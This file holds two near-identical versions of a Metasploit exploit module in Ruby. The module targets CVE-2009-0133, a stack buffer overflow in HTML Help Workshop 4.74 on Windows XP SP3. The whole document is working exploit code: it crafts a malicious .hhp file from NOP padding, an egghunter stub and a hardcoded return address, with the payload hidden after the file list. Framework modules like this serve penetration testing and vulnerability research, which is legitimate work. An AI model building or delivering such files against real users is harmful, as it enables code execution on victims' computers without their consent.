==> metasploit-framework_4.16.48.orig.tar.gz: metasploit-framework-4.16.48/modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb <==
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Egghunter

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in HTML Help Workshop 4.74
          by creating a specially crafted hhp file.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'Encrypt3d.M!nd', 'loneferret', 'jduck' ],
      'References'     =>
        [
          [ 'CVE', '2009-0133' ],
          [ 'BID', '33189' ],
          [ 'OSVDB', '22941' ],
          [ 'EDB', '10323' ],
          [ 'EDB', '10335' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
          'DisablePayloadHandler' => true,
        },
      'Payload'        =>
        {
          'Space'    => 1024,
          'BadChars' => "\x00\x0a\x0d\x1a\x2f\x5c",
          'StackAdjustment' => -4800,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows XP English SP3', { 'Offset' => 280, 'Ret' => 0x00401F93 } ], # CALL EDI hhw.exe v4.74.8702.0
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Jan 17 2009',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME',   [ false, 'The file name.', 'msf.hhp']),
      ])
  end

  def exploit

    # use the egghunter!
    eh_stub, eh_egg = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true })

    off = target['Offset']
    idxf = ""
    idxf << make_nops(off - eh_stub.length)
    idxf << eh_stub
    idxf << [target.ret].pack('V')

    sploit = "[OPTIONS]\r\n"
    sploit << "Index file="
    sploit << idxf
    sploit << "\r\n"
    sploit << "\r\n"
    sploit << "[FILES]\r\n"
    sploit << "\r\n"
    sploit << eh_egg

    hhp = sploit

    print_status("Creating '#{datastore['FILENAME']}' file ...")

    file_create(hhp)
  end
end

==> metasploit-framework_6.1.27.orig.tar.gz: metasploit-framework-6.1.27/modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb <==
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Egghunter

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in HTML Help Workshop 4.74
          by creating a specially crafted hhp file.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'Encrypt3d.M!nd', 'loneferret', 'jduck' ],
      'References'     =>
        [
          [ 'CVE', '2009-0133' ],
          [ 'BID', '33189' ],
          [ 'OSVDB', '22941' ],
          [ 'EDB', '10323' ],
          [ 'EDB', '10335' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
          'DisablePayloadHandler' => true
        },
      'Payload'        =>
        {
          'Space'    => 1024,
          'BadChars' => "\x00\x0a\x0d\x1a\x2f\x5c",
          'StackAdjustment' => -4800,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows XP English SP3', { 'Offset' => 280, 'Ret' => 0x00401F93 } ], # CALL EDI hhw.exe v4.74.8702.0
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2009-01-17',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME',   [ false, 'The file name.', 'msf.hhp']),
      ])
  end

  def exploit

    # use the egghunter!
    eh_stub, eh_egg = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true })

    off = target['Offset']
    idxf = ""
    idxf << make_nops(off - eh_stub.length)
    idxf << eh_stub
    idxf << [target.ret].pack('V')

    sploit = "[OPTIONS]\r\n"
    sploit << "Index file="
    sploit << idxf
    sploit << "\r\n"
    sploit << "\r\n"
    sploit << "[FILES]\r\n"
    sploit << "\r\n"
    sploit << eh_egg

    hhp = sploit

    print_status("Creating '#{datastore['FILENAME']}' file ...")

    file_create(hhp)
  end
end
